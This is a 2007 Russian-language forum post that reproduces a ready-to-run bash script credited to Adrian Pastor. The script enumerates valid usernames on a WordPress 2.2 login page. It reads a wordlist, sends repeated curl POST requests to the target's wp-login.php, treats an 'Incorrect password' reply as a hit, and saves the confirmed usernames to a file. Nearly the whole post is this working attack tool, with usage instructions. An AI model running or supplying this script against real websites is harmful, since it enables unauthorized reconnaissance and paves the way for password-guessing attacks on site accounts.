05.10.2007, 19:54
|
|
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
Провел на форуме:
9751379
Репутация:
3812
|
|
Wordpress 2.2 Username Enumeration
PHP код:
#!/bin/bash
# this script attacks a low-risk username enumeration vul
# on Wordpress 2.2 login page. Previous versions are
# possibly affected as well
#
# Note: you need curl [http://curl.haxx.se/download.html]
# installed on your system for this script to work.
#
# Adrian Pastor - http://www.gnucitizen.org/
if [ $# -ne 2 ]
then
echo "need to parameters! correct syntax is:"
echo "$0 <ip-or-hostname> <wordlist-filename>"
exit 1
fi
for U in `cat $2`
do
#echo $U
if curl -s -d
"log=$U&pwd=mypassword&wp-submit=Login+%C2%BB&redirect_to=" --url
"http://$1/wordpress/wp-login.php" | grep -i 'Incorrect password' >
/dev/null
then
echo "username found!: $U" # print username found on screen
echo $U >> $0.found # save results to file equals to
script name plus .found extension
fi
done
__________________
|
|
|